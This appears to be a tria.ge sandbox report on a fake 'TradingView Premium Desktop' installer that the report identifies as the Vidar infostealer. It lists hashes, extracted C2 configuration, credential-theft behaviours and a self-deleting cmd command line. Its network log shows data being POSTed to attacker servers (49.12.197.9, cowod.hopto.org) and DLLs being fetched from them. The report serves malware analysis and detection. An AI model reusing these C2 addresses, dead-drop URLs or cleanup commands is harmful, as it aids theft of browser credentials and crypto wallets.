Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
90s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05/10/2024, 02:20 UTC
Static task
static1
Behavioral task
behavioral1
Sample
TradingView Premium Desktop.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
TradingView Premium Desktop.exe
Resource
win10v2004-20240802-en
General
-
Target
TradingView Premium Desktop.exe
-
Size
782.1MB
-
MD5
a44c11ff27b4350c9e4d368cd6ae4583
-
SHA1
9f5de149596e55a9b3560f3e162ce29d18c87f30
-
SHA256
311c992c91b94c32e6bdb543da6944a2c3c4ee45305416f2d5d9c4a96eb05099
-
SHA512
4cf4e9fbb39f24a1eabcbfe3e07cbfff568a62b27cb7587dd6bb466270b2c4d5673fb6ecaeb277bdf5d639e361bd33e396c1bab1c97e569e1d9c7180cc193f28
-
SSDEEP
98304:NCVtEz6jrCmBJ9jQeXGuzTdodTqVcfK6mkzfV9F2QNL4AXAtVo7:Ncw1y3zZoJK6mEdD2DAQE7
Malware Config
Extracted
vidar
11
dd3c663b33910bd77937a09a739dc3d6
https://steamcommunity.com/profiles/76561199780418869
https://t.me/ae5ed
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Signatures
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral2/memory/4420-7-0x0000000000840000-0x000000000134F000-memory.dmp family_vidar_v7 behavioral2/memory/4420-70-0x0000000000840000-0x000000000134F000-memory.dmp family_vidar_v7 behavioral2/memory/4420-71-0x0000000000840000-0x000000000134F000-memory.dmp family_vidar_v7 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation TradingView Premium Desktop.exe -
Loads dropped DLL 2 IoCs
pid Process 4420 TradingView Premium Desktop.exe 4420 TradingView Premium Desktop.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TradingView Premium Desktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TradingView Premium Desktop.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TradingView Premium Desktop.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4496 timeout.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4420 TradingView Premium Desktop.exe 4420 TradingView Premium Desktop.exe 4420 TradingView Premium Desktop.exe 4420 TradingView Premium Desktop.exe 4420 TradingView Premium Desktop.exe 4420 TradingView Premium Desktop.exe 4420 TradingView Premium Desktop.exe 4420 TradingView Premium Desktop.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4420 wrote to memory of 404 4420 TradingView Premium Desktop.exe 91 PID 4420 wrote to memory of 404 4420 TradingView Premium Desktop.exe 91 PID 4420 wrote to memory of 404 4420 TradingView Premium Desktop.exe 91 PID 404 wrote to memory of 4496 404 cmd.exe 93 PID 404 wrote to memory of 4496 404 cmd.exe 93 PID 404 wrote to memory of 4496 404 cmd.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\TradingView Premium Desktop.exe"C:\Users\Admin\AppData\Local\Temp\TradingView Premium Desktop.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBGIJEHIIDGC" & exit2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4496
-
-
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request196.249.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request0.205.248.87.in-addr.arpaIN PTRResponse0.205.248.87.in-addr.arpaIN PTRhttps-87-248-205-0lgwllnwnet
-
Remote address:8.8.8.8:53Request0.205.248.87.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request0.205.248.87.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request76.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request76.32.126.40.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request76.32.126.40.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Requeststeamcommunity.comIN AResponsesteamcommunity.comIN A104.82.234.109
-
Remote address:104.82.234.109:443RequestGET /profiles/76561199780418869 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sat, 05 Oct 2024 02:21:49 GMT
Content-Length: 34935
Connection: keep-alive
Set-Cookie: sessionid=b7da2e7fb2668108cd9e8f94; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
-
Remote address:8.8.8.8:53Request109.234.82.104.in-addr.arpaIN PTRResponse109.234.82.104.in-addr.arpaIN PTRa104-82-234-109deploystaticakamaitechnologiescom
-
Remote address:49.12.197.9:443RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request9.197.12.49.in-addr.arpaIN PTRResponse9.197.12.49.in-addr.arpaIN PTRstatic91971249clientsyour-serverde
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBGCBAFCGDAAKFIDGIEG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 4601
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestGET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:55 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:55 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestGET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:55 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:55 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestGET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:56 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestGET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:56 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestGET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:56 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestGET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:56 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDHCGDGIEBKJKFHJJKFC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 117969
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:49.12.197.9:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:22:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestcowod.hopto.orgIN AResponsecowod.hopto.orgIN A45.132.206.251
-
Remote address:45.132.206.251:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: cowod.hopto.org
Content-Length: 1973
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:8.8.8.8:53Request251.206.132.45.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request53.210.109.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.31.95.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request48.229.111.52.in-addr.arpaIN PTRResponse
-
104.82.234.109:443https://steamcommunity.com/profiles/76561199780418869tls, httpTradingView Premium Desktop.exe2.2kB 42.5kB 39 37
HTTP Request
GET https://steamcommunity.com/profiles/76561199780418869HTTP Response
200 -
958 B 2.7kB 11 8
HTTP Request
GET https://49.12.197.9/HTTP Response
200 -
1.4kB 622 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.5kB 2.2kB 10 7
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.6kB 6.4kB 13 10
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.4kB 672 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
5.9kB 565 B 13 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
92.5kB 2.5MB 1836 1831
-
1.5kB 565 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.5kB 565 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
24.4kB 707.6kB 517 514
HTTP Request
GET https://49.12.197.9/freebl3.dllHTTP Response
200 -
21.7kB 627.8kB 458 455
HTTP Request
GET https://49.12.197.9/mozglue.dllHTTP Response
200 -
16.3kB 464.7kB 341 338
HTTP Request
GET https://49.12.197.9/msvcp140.dllHTTP Response
200 -
9.8kB 266.6kB 199 196
HTTP Request
GET https://49.12.197.9/softokn3.dllHTTP Response
200 -
3.7kB 84.0kB 68 65
HTTP Request
GET https://49.12.197.9/vcruntime140.dllHTTP Response
200 -
71.3kB 2.1MB 1534 1531
HTTP Request
GET https://49.12.197.9/nss3.dllHTTP Response
200 -
1.5kB 2.8kB 10 7
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.4kB 748 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
122.8kB 2.2kB 97 48
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.4kB 518 B 8 5
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.4kB 518 B 8 5
-
2.5kB 132 B 6 3
HTTP Request
POST http://cowod.hopto.org/
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
196.249.167.52.in-addr.arpa
-
213 B 116 B 3 1
DNS Request
0.205.248.87.in-addr.arpa
DNS Request
0.205.248.87.in-addr.arpa
DNS Request
0.205.248.87.in-addr.arpa
-
213 B 157 B 3 1
DNS Request
76.32.126.40.in-addr.arpa
DNS Request
76.32.126.40.in-addr.arpa
DNS Request
76.32.126.40.in-addr.arpa
-
219 B 144 B 3 1
DNS Request
95.221.229.192.in-addr.arpa
DNS Request
95.221.229.192.in-addr.arpa
DNS Request
95.221.229.192.in-addr.arpa
-
64 B 80 B 1 1
DNS Request
steamcommunity.com
DNS Response
104.82.234.109
-
73 B 139 B 1 1
DNS Request
109.234.82.104.in-addr.arpa
-
70 B 125 B 1 1
DNS Request
9.197.12.49.in-addr.arpa
-
61 B 77 B 1 1
DNS Request
cowod.hopto.org
DNS Response
45.132.206.251
-
73 B 134 B 1 1
DNS Request
251.206.132.45.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
18.31.95.13.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
53.210.109.20.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
48.229.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571